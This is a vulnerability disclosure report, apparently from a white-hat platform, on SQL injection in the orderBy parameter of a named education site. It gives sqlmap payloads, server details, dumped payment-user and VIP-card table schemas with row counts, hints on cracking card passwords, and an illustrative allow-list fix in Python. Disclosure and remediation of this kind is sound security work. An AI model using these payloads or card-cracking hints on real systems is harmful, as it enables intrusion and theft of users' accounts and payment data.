2015-01-21: Details reported to the vendor, awaiting vendor handling
2015-01-22: Vendor confirmed; details disclosed to the vendor only
2015-02-01: Details disclosed to core white hats and domain experts
2015-02-11: Details disclosed to regular white hats
2015-02-21: Details disclosed to intern white hats
2015-03-07: Details disclosed to the public
Why is everything going through the small-vendor process now? Requesting front-page listing.
Injection point (POST request):
http://liuying.ciwong.com/web/work/_DesignWorkList?0.0916321964468807
POST body: gradePhase=1&workType=4&title=e&orderBy=FinalistOn&orderByType=1&pageCurrent=1
The orderBy field is not filtered.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: orderBy (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: gradePhase=1&workType=4&title=e&orderBy=FinalistOn AND (SELECT 5842 FROM(SELECT COUNT(*),CONCAT(0x71766a7871,(SELECT (CASE WHEN (5842=5842) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&orderByType=1&pageCurrent=1

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: gradePhase=1&workType=4&title=e&orderBy=FinalistOn; SELECT SLEEP(5)-- &orderByType=1&pageCurrent=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
current user: 'ciwong_it@%'

Over 7.2 million user records:

Database: cw_pay
Table: pay_user
[9 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| amount        | double       |
| is_lock       | tinyint(4)   |
| lock_amount   | double       |
| password      | varchar(128) |
| password_salt | varchar(128) |
| un_lock_time  | datetime     |
| update_time   | datetime     |
| user_id       | bigint(20)   |
| user_name     | varchar(50)  |
+---------------+--------------+

+----------+---------+
| Table    | Entries |
+----------+---------+
| pay_user | 7256464 |
+----------+---------+
After dumping, though, many of the records turned out to be empty.

Over 1 million VIP card records:
current user: 'ciwong_it@%'
Database: cw_pay
Table: vip_card
[7 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| begin_time  | datetime    |
| card_id     | varchar(10) |
| card_pwd    | varchar(50) |
| card_type   | tinyint(4)  |
| create_time | datetime    |
| expire_time | datetime    |
| status      | tinyint(4)  |
+-------------+-------------+

+----------+---------+
| Table    | Entries |
+----------+---------+
| vip_card | 1491556 |
+----------+---------+
Dumped part of the data; the card passwords can be looked up on cmd5, and the card secrets are 8-digit numbers.
They could apparently be used for top-ups...; not verified further.

Fix suggestions:
1. Filter the input.
2. Restrict table access.
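The root cause described above is a sort key taken straight from the orderBy parameter and concatenated into the SQL text. An ORDER BY column cannot be passed as a bound parameter, so the usual fix for "filter the input" is an allow-list that maps the client's sort names onto real column names, with every other value bound instead of concatenated. The following Python example is added here to illustrate that fix; it is not code from the report or from the affected site. The table and column names (work, grade_phase, finalist_on, etc.), the sample rows, and the use of an in-memory SQLite database are assumptions made for the demo; the page only shows the request parameters and the MySQL back end.

```python
import sqlite3

# Constructed sample rows standing in for the "work list" the endpoint queries.
# Schema is an assumption: (id, grade_phase, work_type, title, finalist_on).
SAMPLE_WORKS = [
    (1, 1, 4, "essay 1", "2015-01-10"),
    (2, 1, 4, "essay 2", "2015-01-12"),
    (3, 2, 4, "essay 3", "2015-01-11"),
]

# Allow-list: the only sort keys a client may name, mapped to real column names.
# ORDER BY cannot be bound as a query parameter, so a lookup table is the control.
ALLOWED_ORDER_BY = {
    "FinalistOn": "finalist_on",
    "Title": "title",
}
ALLOWED_ORDER_TYPE = {"0": "ASC", "1": "DESC"}

# Head of the report's error-based orderBy payload (copied from the page for the demo).
INJECTED_ORDER_BY = "FinalistOn AND (SELECT 5842 FROM(SELECT COUNT(*),CONCAT(0x71766a7871,"
STACKED_ORDER_BY = "FinalistOn; SELECT SLEEP(5)-- "


def build_query_vulnerable(params):
    """The pattern behind the report: request values are pasted into the SQL text.
    Returned only as a string here; it is never executed."""
    direction = "DESC" if params["orderByType"] == "1" else "ASC"
    return (f"SELECT id, title FROM work WHERE grade_phase = {params['gradePhase']} "
            f"AND work_type = {params['workType']} AND title LIKE '%{params['title']}%' "
            f"ORDER BY {params['orderBy']} {direction}")


def build_query_hardened(params):
    """Return (sql, bind_values). Sort column and direction come only from the
    allow-list; numeric filters are type-checked; the free-text title is bound.
    SQLite uses '?' placeholders; MySQL drivers such as mysqlclient use '%s'."""
    try:
        column = ALLOWED_ORDER_BY[params["orderBy"]]
        direction = ALLOWED_ORDER_TYPE[params["orderByType"]]
        grade_phase = int(params["gradePhase"])
        work_type = int(params["workType"])
    except (KeyError, ValueError) as exc:
        # Anything outside the allow-list is rejected, not sanitised.
        raise ValueError(f"rejected request parameter: {exc!r}") from None
    sql = ("SELECT id, title FROM work WHERE grade_phase = ? AND work_type = ? "
           f"AND title LIKE ? ORDER BY {column} {direction}")
    return sql, (grade_phase, work_type, f"%{params['title']}%")


def run_hardened(params):
    """Execute the hardened query against an in-memory table and return the ids."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE work (id INTEGER, grade_phase INTEGER, "
                 "work_type INTEGER, title TEXT, finalist_on TEXT)")
    conn.executemany("INSERT INTO work VALUES (?, ?, ?, ?, ?)", SAMPLE_WORKS)
    sql, binds = build_query_hardened(params)
    return [row[0] for row in conn.execute(sql, binds)]


def request_params(order_by):
    """The report's POST body with the orderBy value swapped in."""
    return {"gradePhase": "1", "workType": "4", "title": "e",
            "orderBy": order_by, "orderByType": "1"}


def hardened_rejects(order_by):
    """True if the allow-list check refuses this orderBy value."""
    try:
        build_query_hardened(request_params(order_by))
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Legitimate request works; both payload shapes from the report are refused.
    print(run_hardened(request_params("FinalistOn")))
    print(build_query_vulnerable(request_params(INJECTED_ORDER_BY)))
    print(hardened_rejects(INJECTED_ORDER_BY), hardened_rejects(STACKED_ORDER_BY))
```

The second fix suggestion, restricting table access, belongs on the database side: the report shows the application account reading cw_pay.pay_user and cw_pay.vip_card, so an account scoped to the work-list tables alone would have limited what the injection could reach even before the input check was in place.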
Severity: High
Vulnerability Rank: 19
Confirmed: 2015-01-22 14:43
Vulnerability fix in progress...
Vendor response: none yet